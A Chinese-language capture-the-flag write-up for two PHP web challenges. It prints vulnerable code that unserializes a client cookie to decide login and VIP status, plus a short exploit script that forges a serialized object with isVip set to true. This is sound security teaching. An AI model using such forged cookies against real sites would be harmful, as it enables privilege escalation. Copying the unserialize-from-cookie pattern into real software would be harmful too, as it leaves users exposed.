阿新 • • 發佈:2021-09-08
web254
直接get傳參就行了
username=xxxxxx&password=xxxxx
web255
拿到程式碼
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/

// Error reporting is switched off, so warnings and errors raised further down
// (for example from a missing or malformed cookie) are not reported.
error_reporting(0);
// Prints this file's own source, syntax-highlighted, into the response.
highlight_file(__FILE__);
// flag.php is not shown on the page; presumably it defines the global $flag
// that vipOneKeyGetFlag() reads.
include('flag.php');

/**
 * User record whose three public properties act as the credentials and the
 * privilege flag at the same time.
 *
 * Nothing in the class constrains where the property values come from: when an
 * instance is produced by unserialize(), username, password and isVip are
 * whatever the serialized input says, not the defaults declared here.
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    /** Returns the isVip property as-is. */
    public function checkVip(){
        return $this->isVip;
    }

    /**
     * Strictly compares the supplied pair with this object's own username and
     * password properties; there is no server-side credential store involved.
     */
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }

    /** Echoes the global $flag when isVip is truthy, otherwise a refusal message. */
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

// Both values come from the query string; the isset() test below fails when
// either parameter is absent.
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // SECURITY (review): the object is rebuilt from a client-controlled cookie.
    // All three properties are therefore chosen by the client, so login() and
    // checkVip() below compare client input with client input and provide no
    // authentication or authorization. unserialize() on untrusted data can also
    // instantiate any class that is loaded in the application.
    // Safer designs: keep identity and privilege in server-side session state;
    // if data has to round-trip through the client, use json_decode() with
    // explicit field validation and an HMAC checked with hash_equals(); where
    // unserialize() cannot be avoided, pass ['allowed_classes' => false].
    // Note: when the cookie is missing or is not a valid serialized object,
    // unserialize() does not return an object and the method call below fails;
    // error_reporting(0) keeps that failure out of the output.
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        // Privilege decision taken purely from the deserialized object.
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        // Reached only when login() returns false; a successful login by an
        // object whose isVip is false prints nothing at all.
        echo "no vip,no flag";
    }
}
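首先透過 GET 傳入 username 和 password,進入第一個 if 語句;接著程式對 cookie 中的 user 值進行反序列化。由於 login() 和 checkVip() 比對的都是這個反序列化物件自身的屬性,而這些屬性完全由用戶端送出的 cookie 決定,所以只要在 cookie 中構造一個 isVip 為 true 的序列化物件即可。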
exp
<?php

/**
 * Copy of the challenge's ctfShowUser reduced to its three public properties.
 *
 * Only the class name and the property names and values appear in PHP's
 * serialized form, so the methods are not needed here. isVip is preset to true.
 * This is accepted by the challenge only because the server rebuilds the object
 * from the client's cookie instead of keeping the privilege flag server-side.
 */
class ctfShowUser
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip = true;
}

// Serialize one instance and URL-encode it; the encoded string is what goes
// into the value of the `user` cookie.
echo urlencode(serialize(new ctfShowUser()));
需要特別注意的是,cookie 欄位中的值需要先做 URL 編碼(cookie 的名稱以及儲存的字串值都必須經過 URL 編碼)。序列化字串中含有分號、雙引號等字元,不編碼的話 cookie 值會在分號處被截斷。